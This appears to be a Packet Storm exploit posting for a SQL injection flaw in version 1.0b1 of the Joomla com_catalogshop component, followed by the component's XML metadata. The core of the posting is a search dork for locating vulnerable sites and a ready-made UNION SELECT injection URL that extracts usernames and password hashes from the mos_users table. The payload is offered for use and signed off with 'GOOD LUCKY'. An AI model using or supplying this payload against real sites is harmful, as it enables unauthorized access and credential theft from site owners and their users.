The Joomla com_catalogshop component version 1.0b1 suffers from a remote SQL injection vulnerability.
7be66c93775be50c2c751413789ec196b88376ce39c82b1b2decd2c0437a19a5#########################################################################
#
# joomla SQL Injection(com_catalogshop)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#########################################################################
#
# DorKs 1 : allinurl: "com_catalogshop"
#
########################################################################
EXPLOIT :
index.php?option=com_catalogshop&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/null,null,concat(password),3,4,5,6,7,8,9,10,11,12,concat(username)/**/from/**/mos_users/*
#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################
<name>catalogshop</name>
<creationDate>18.01.2005</creationDate>
<author>K.J. Strickland</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>postbox@pixelbunyip.com</authorEmail>
<authorUrl>www.pixelbunyip.com and www.mambomates.com</authorUrl>
<version>1.0 beta 1 ruff n ready</version>
<description>Catalogshop is a simple Mambo ecommerce component.</description>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed